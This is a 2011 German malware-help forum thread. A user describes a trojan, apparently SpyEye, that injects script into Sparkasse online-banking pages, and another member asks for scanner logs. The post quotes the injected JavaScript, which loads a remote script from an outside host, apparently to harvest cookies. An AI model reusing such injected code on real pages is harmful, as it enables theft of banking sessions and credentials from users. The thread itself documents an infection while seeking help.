Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Trojaner verändert Sparkassenseite beim Starten! (https://www.trojaner-board.de/102310-trojaner-veraendert-sparkassenseite-beim-starten.html)

dsdino 10.08.2011 08:25
Trojaner verändert Sparkassenseite beim Starten!
 
Hallo!
Habe einen Trojaner entdeckt der beim Starten verschiedener Sparkassenseiten (nicht alle) in den Body Tag folgenden Code kopiert.

<script type="text/javascript">
var mcook=null;
var ooo=1;
function get_cookm(){
var str='<script type="text/javascript" src="https://grandtarf.com/cook2/get_cook.php?rnd='+Math.random()+'"></scr'+'ipt>';
document.write(str);
}
get_cookm();

Microsoft Security Essentials und Spybot haben nichts gefunden!

Kennt Jemand diesen Code?
Weiß Jemand um was für einen Trojaner es sich handelt?

Ich habe festgestellt daß sich die verseuchte Datei im Verzeichnis
C:\Users\%USERNAME%\AppData\Roaming\Microsoft befindet.

Nach einer Systemwiederherstellung war dieser Effekt verschwunden.

Gruß dsdino

PS
Betriebssystem ist Windows 7
Habe jetzt einen Scan mit Anti-Malware gemacht und es wurde im Recycler der Trojan Spyeyes gefunden und erfolgreich entfernt.

Sind noch weitere Maßnamen notwendig?
Gruß dsdino

cosinus 10.08.2011 15:37
Zitat:
Habe einen Trojaner entdeckt der beim Starten verschiedener Sparkassenseiten
Solche Angaben reichen nicht, bitte poste die vollständigen Angaben/Logs der Virenscanner.


Alle Zeitangaben in WEZ +1. Es ist jetzt 01:36 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27